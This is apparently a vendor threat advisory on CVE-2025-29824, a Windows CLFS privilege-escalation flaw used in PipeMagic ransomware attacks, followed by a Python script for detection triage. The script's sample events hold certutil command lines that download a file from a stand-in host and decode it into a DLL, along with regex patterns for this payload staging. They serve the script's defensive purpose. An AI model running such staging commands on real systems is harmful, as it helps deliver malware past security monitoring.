
A newly discovered Windows zero-day vulnerability, CVE-2025-29824, is actively exploited by a targeted ransomware campaign involving the PipeMagic trojan. Continue reading this Cybersecurity Threat Advisory to limit the impact of this vulnerability.
What is the threat?
CVE-2025-29824 is a critical flaw in the Windows Common Log File System (CLFS) that enables attackers to escalate privileges to SYSTEM-level access, allowing them to deploy ransomware and gain full control of compromised systems. Following the initial compromise, attackers can deploy ransomware payloads involving the PipeMagic trojan. Microsoft has attributed the activity to a threat group it tracks as Storm-2460.
Why is it noteworthy?
This vulnerability is particularly significant because it is actively exploited in real-world attacks. The attacks have targeted a range of industries globally, including IT and real estate in the U.S., banks in Venezuela, software companies in Spain, and retail businesses in Saudi Arabia. The attackers used PipeMagic, a modular trojan that facilitates privilege escalation, similar to malware seen in previous attacks such as Nokoyawa and RansomEXX. By exploiting the RtlSetAllBits function, they manipulated security settings to gain full control of affected systems. Although investigators have not identified an actual ransomware payload, they found ransom notes on TOR websites that link back to RansomEXX, suggesting the group’s involvement.
What is the exposure or risk?
Systems that have not applied the latest Windows security updates remain vulnerable to CVE-2025-29824, allowing attackers to escalate privileges to SYSTEM or root level. Exploitation can lead to severe consequences, such as data exfiltration, credential theft via LSASS memory dumps, and file encryption, all of which can result in significant operational disruption and data loss. The attackers have used MSBuild scripts and certutil-based payload staging techniques to evade traditional security detection. It’s also important to note that Windows 11 version 24H2 is not affected, as it contains improvements in system information access permissions that mitigate the risk.
What are the recommendations?
Barracuda recommends the following actions to limit the impact of this vulnerability:
- Apply the latest updates from Microsoft that address CVE-2025-29824.
- Monitor for suspicious activity involving MSBuild, certutil, or NtQuerySystemInformation APIs.
- Follow the principle of least privilege across user accounts and processes.
- Limit or monitor the use of built-in tools often abused by attackers, such as PowerShell, WMI, and Task Scheduler.
- Maintain secure, offline backups and regularly verify their integrity.
- Educate employees about phishing and common methods of malware delivery.
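One way to act on the monitoring recommendation above is to triage process-creation telemetry for the certutil staging and MSBuild patterns the advisory describes. The following is an added example, not code from Barracuda or Microsoft; the event records are constructed in a simplified Sysmon Event ID 1 shape, and the heuristics (certutil download/decode switches, MSBuild project files under user-writable paths) are the author's assumptions about what is worth flagging, not indicators taken from the advisory.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample events (hypothetical data, not from the advisory).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://example.invalid/stage.txt C:\Users\Public\stage.txt",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -decode C:\Users\Public\stage.txt C:\Users\Public\stage.dll",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "CommandLine": r"MSBuild.exe C:\Users\Public\build.xml",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "CommandLine": r"MSBuild.exe C:\src\app\app.csproj /t:Build",
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -verify C:\certs\server.cer",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

# certutil switches commonly used to fetch or decode a staged payload (assumed heuristic).
CERTUTIL_STAGING_FLAGS = re.compile(r"-(urlcache|decode|decodehex)\b", re.IGNORECASE)
# Paths a standard user can write to; a build project launched from here is unusual (assumed heuristic).
USER_WRITABLE = re.compile(
    r"\\(Users\\Public|Users\\[^\\]+\\AppData|Windows\\Temp|ProgramData)\\", re.IGNORECASE)
# Project-file argument handed to MSBuild (inline tasks are often carried in .xml/.csproj files).
MSBUILD_PROJECT = re.compile(r"\S+\.(?:csproj|vbproj|proj|xml)\b", re.IGNORECASE)


def triage_event(event: Dict[str, str]) -> Optional[str]:
    """Return a short reason if the event matches a staging pattern, else None."""
    image = event["Image"].lower()
    cmd = event["CommandLine"]
    if image.endswith("\\certutil.exe") and CERTUTIL_STAGING_FLAGS.search(cmd):
        return "certutil download/decode switch used for payload staging"
    if image.endswith("\\msbuild.exe"):
        project = MSBUILD_PROJECT.search(cmd)
        if project and USER_WRITABLE.search(project.group(0)):
            return "MSBuild executing a project file from a user-writable path"
    return None


def triage(events: List[Dict[str, str]]) -> List[Tuple[int, str]]:
    """Index and reason for every event that merits analyst review."""
    return [(i, r) for i, e in enumerate(events) if (r := triage_event(e)) is not None]


if __name__ == "__main__":
    for idx, reason in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {reason} :: {SAMPLE_EVENTS[idx]['CommandLine']}")
```

Benign certutil use (certificate verification) and a developer's normal MSBuild invocation pass through untouched, which keeps the rule usable as a review queue rather than an alert storm.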
References
For more in-depth information about the recommendations, please visit the following links:
- https://thehackernews.com/2025/04/pipemagic-trojan-exploits-windows-clfs.html
- https://nvd.nist.gov/vuln/detail/CVE-2025-29824
If you have any questions about this Cybersecurity Threat Advisory, don’t hesitate to get in touch with Barracuda Managed XDR’s Security Operations Center.
This post originally appeared on Smarter MSP.